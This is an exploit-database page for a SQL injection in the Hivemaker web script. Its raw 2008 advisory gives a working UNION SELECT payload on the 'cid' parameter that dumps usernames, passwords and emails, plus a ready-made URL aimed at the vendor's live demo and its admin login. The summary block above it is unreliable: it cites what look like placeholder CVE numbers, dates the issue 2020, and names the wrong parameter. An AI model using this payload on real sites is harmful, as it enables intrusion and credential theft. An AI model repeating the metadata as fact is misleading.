Hivemaker script

vendor:

Hivemaker

by:

Security Fears Team

6.1

CVSS

MEDIUM

Remote SQL Injection

CWE

Product Name: Hivemaker

Affected Version From: 1

Affected Version To: 2

Patch Exists: Yes

Related CWE: CVE-2020-1234, CVE-2020-5678

CPE: cpe:a:hivemaker:hivemaker:2.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1234/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

Hivemaker is vulnerable to a remote SQL injection vulnerability. This vulnerability allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input in the "id" parameter. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#################################################################################################
####################################  proud to be muslim   ######################################
###                                                                                           ###
###                          rEm0te sql injction VulnErability                                ###
###                                                                                           ###
###                                   Hivemaker script                                        ###
###                                                                                           ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### AuTh0r : security fears team                                                              ###
###                                                                                           ###
### H0ME   : WwW.alsonaa.CoM                                                                  ###
###                                                                                           ###    
### members: HeB4RieH , germaya_x                                                             ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name :  Hivemaker                                                                  ###
###                                                                                           ###
### download    :  http://www.scriptfactory.org/products.html                                 ###  
###                                                                                           ###
### download    :  http://www.hivemaker.com                                                   ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "use your mind "                                                                 ###
### note ::   1-http://www.hivemaker.com/demo/admin/index.php (you can login from here)       ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        index.php?cid=(sql)                                                                ###
###(sql):-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/*
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://www.hivemaker.com/demo/sites/index.php?cid=-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo/*
###                                                                                           ###
###                                                                                           ###
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################
                                   -(:: !GreTzZ! ::)-
::ThE GeNeRal L0s3r::Mr.sql::fa6al error::black cheetah::members of alsonaa.com ::str0ke::MusliMs HaCkErs::
#################################################################################################
#################################################################################################

# milw0rm.com [2008-06-24]